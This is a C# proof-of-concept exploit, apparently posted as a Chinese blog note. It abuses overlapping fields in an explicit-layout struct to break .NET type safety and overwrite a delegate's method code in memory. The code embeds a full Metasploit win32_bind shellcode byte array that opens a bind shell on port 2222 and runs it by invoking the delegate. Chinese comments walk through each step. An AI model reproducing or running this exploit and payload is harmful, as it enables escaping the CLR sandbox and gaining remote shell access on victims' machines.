- using System;
- using System.IO;
- using System.Threading;
- using System.Text;
- using System.Runtime.InteropServices;
- class Union1
- {
- public volatile int i = 0; //volatile 修饰为引用类型 这里不管有无修饰符与否都是值类型 长度=4
- public int j;//长度=4
- }
- class Union2
- {
- public object o; //均为引用类型 (指针) 长度=4
- public int[] arr = null;// 长度=4
- }
- /// <summary>
- /// based on yunshu's 《使用安全的C#代码跳出CLR沙箱》
- /// 原理:
- /// 1.初始化一个方法 和一个数组
- /// 2.将方法的内存地址 和数组的内存地址 转换成int,使得修改int就可以改变方法和数组的内存地址
- /// 3.修改数组的的保存地址落到方法的代码段地址中
- /// 4.修改数组内容,达到修改方法的效果。
- /// </summary>
- class TypeSafetyExploitPoC
- {
- [StructLayout(LayoutKind.Explicit)] //精确布局每个成员, Sequential 为顺序布局
- struct UnsafeUnion
- {
- [FieldOffset(0)]//内存偏移0
- internal Union1 u1;
- [FieldOffset(0)]//内存偏移0
- internal Union2 u2;
- //两个成员内存偏移都是0 且长度相同 导致内存重合
- }
- static void DummyMethod()
- {
- //方法入口
- }
- internal static void Main(string[] args)
- {
- Union1 u1;
- Union2 u2 = new Union2();//初始化 u2 存放了两个指针(object,array),每个4byte
- UnsafeUnion uu = new UnsafeUnion(); //在内存中精确布局结构
- uu.u2 = u2;//赋值uu 的u2成员,由于uu.u1成员和uu.u2成员内存重合,uu.u1已经不为空
- u1 = uu.u1;//赋值u1 u1的两个元素为 i,j ,此时就把u2的两个元素指针用u1.i 和u1.j 读出。
- ThreadStart del = new ThreadStart(DummyMethod);//初始化一个方法入口
- u2.o = del;//获取方法入口地址, 此时u1.i值就是 del方法的地址
- u1.j = u1.i;//将u2.arr 指向del方法
- u1.j = u2.arr[2]-12 ;//修改u2.arr的保存位置(指针),到指向方法的入口。也就是修改“方法”的代码段。
- /* 方法在内存的结构 如果用array来读 没4byte 为一个元素 所以arr[2] 就是要找的 _methodPtrAux
- 790fd0f0 40000ff 4 System.Object 0 instance 021a1744 _target --->调用源
- 7910ebc8 4000100 8 ...ection.MethodBase 0 instance 021a18fc _methodBase --->array[0]
- 791016bc 4000101 c System.IntPtr 1 instance 007C09FC _methodPtr --->array[1]
- 791016bc 4000102 10 System.IntPtr 1 instance 0029C040 _methodPtrAux --->array[2] 要把shellcode放到这前面
- */
- #region 修改数组内容--》修改方法的内容
- MemoryStream mem = new MemoryStream();
- BinaryWriter bw = new BinaryWriter(mem);
- BinaryReader reader = new BinaryReader(mem);
- try
- {
- // win32_bind - EXITFUNC=thread LPORT=2222 Size=344 Encoder=PexFnstenvSub http://metasploit.com
- byte[] shellcode = { 0x29, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0x0e, 0x4b, 0x46, 0x7e, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xf2, 0x21, 0xad, 0x33, 0xe6, 0xb2, 0xb9, 0x81, 0xf1, 0x2b, 0xcd, 0x12, 0x2a, 0x6f, 0xcd, 0x3b, 0x32, 0xc0, 0x3a, 0x7b, 0x76, 0x4a, 0xa9, 0xf5, 0x41, 0x53, 0xcd, 0x21, 0x2e, 0x4a, 0xad, 0x37, 0x85, 0x7f, 0xcd, 0x7f, 0xe0, 0x7a, 0x86, 0xe7, 0xa2, 0xcf, 0x86, 0x0a, 0x09, 0x8a, 0x8c, 0x73, 0x0f, 0x89, 0xad, 0x8a, 0x35, 0x1f, 0x62, 0x56, 0x7b, 0xae, 0xcd, 0x21, 0x2a, 0x4a, 0xad, 0x18, 0x85, 0x47, 0x0d, 0xf5, 0x51, 0x57, 0x47, 0x95, 0x0d, 0x67, 0xcd, 0xf7, 0x62, 0x6f, 0x5a, 0x1f, 0xcd, 0x7a, 0x9d, 0x1a, 0x85, 0x08, 0x76, 0xf5, 0x4e, 0x47, 0xcd, 0x0e, 0x12, 0xe6, 0xcd, 0x3e, 0x06, 0x15, 0x2e, 0xf0, 0x40, 0x45, 0xaa, 0x2e, 0xf1, 0x9d, 0x20, 0x2d, 0x68, 0x23, 0x75, 0x4c, 0x66, 0x3c, 0x35, 0x4c, 0x51, 0x1f, 0xb9, 0xae, 0x66, 0x80, 0xab, 0x82, 0x35, 0x1b, 0xb9, 0xa8, 0x51, 0xc2, 0xa3, 0x18, 0x8f, 0xa6, 0x4e, 0x7c, 0x5b, 0x21, 0x44, 0x81, 0xde, 0x23, 0x9f, 0x77, 0xfb, 0xe6, 0x11, 0x81, 0xd8, 0x18, 0x15, 0x2d, 0x5d, 0x18, 0x05, 0x2d, 0x4d, 0x18, 0xb9, 0xae, 0x68, 0x23, 0x4e, 0xd0, 0x68, 0x18, 0xcf, 0x9f, 0x9b, 0x23, 0xe2, 0x64, 0x7e, 0x8c, 0x11, 0x81, 0xd8, 0x21, 0x56, 0x2f, 0x5b, 0xb4, 0x96, 0x16, 0xaa, 0xe6, 0x68, 0x97, 0x59, 0xb4, 0x90, 0x2d, 0x5b, 0xb4, 0x96, 0x16, 0xeb, 0x02, 0xc0, 0x37, 0x59, 0xb4, 0x90, 0x2e, 0x5a, 0x1f, 0x13, 0x81, 0xde, 0xd8, 0x2e, 0x99, 0x77, 0x8d, 0x3f, 0x29, 0xf1, 0x9d, 0x13, 0x81, 0xde, 0x2d, 0x2c, 0x1a, 0x68, 0x23, 0x25, 0x13, 0x87, 0xae, 0x2c, 0x2e, 0x57, 0x62, 0x8a, 0xf7, 0xe9, 0x21, 0x02, 0xf7, 0xec, 0x7a, 0x86, 0x8d, 0xa4, 0xb5, 0x04, 0x53, 0xf0, 0x09, 0x6a, 0xed, 0x83, 0x31, 0x7e, 0xd5, 0xa5, 0xe0, 0x2e, 0x0c, 0xf0, 0xf8, 0x50, 0x81, 0x7b, 0x0f, 0xb9, 0xa8, 0x55, 0x1c, 0x14, 0x2f, 0x5f, 0x1a, 0x2c, 0x7f, 0x5f, 0x1a, 0x13, 0x2f, 0xf1, 0x9b, 0x2e, 0xd3, 0xd7, 0x4e, 0x88, 0x2d, 0xf1, 0x9d, 0x2c, 0x81, 0xf1, 0x7c, 0xb9, 0xae, 0x85, 0x1c, 0xba, 0xfd, 0xca, 0x2f, 0xb9, 0xa8, 0x5c, 0xb4, 0x96, 0x16, 0xe1, 0x85, 0xa6, 0x1e, 0x5d, 0xb4, 0x90, 0x81, 0xde, 0x4b, 0x46, 0x7e };
- bw.Write(shellcode, 0, shellcode.Length);
- }
- catch (Exception e)
- {
- Console.WriteLine("Write error." + e.Message);
- }
- try
- {
- byte[] tmp = mem.ToArray();
- for (int i = 0; i < tmp.Length / 4; i++)
- {
- u2.arr[1 + i] = BitConverter.ToInt32(tmp, i * 4);
- }
- del();
- }
- catch
- {
- }
- #endregion
- }
- }
.net exploit poc 笔记
最新推荐文章于 2024-06-24 12:14:48 发布